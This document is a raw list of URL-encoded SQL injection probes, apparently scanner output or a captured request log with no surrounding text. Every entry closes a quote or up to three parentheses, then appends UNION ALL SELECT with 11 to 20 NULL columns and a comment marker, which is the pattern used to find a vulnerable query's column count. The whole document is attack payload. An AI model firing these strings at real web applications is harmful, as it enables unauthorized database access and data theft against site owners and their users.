foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 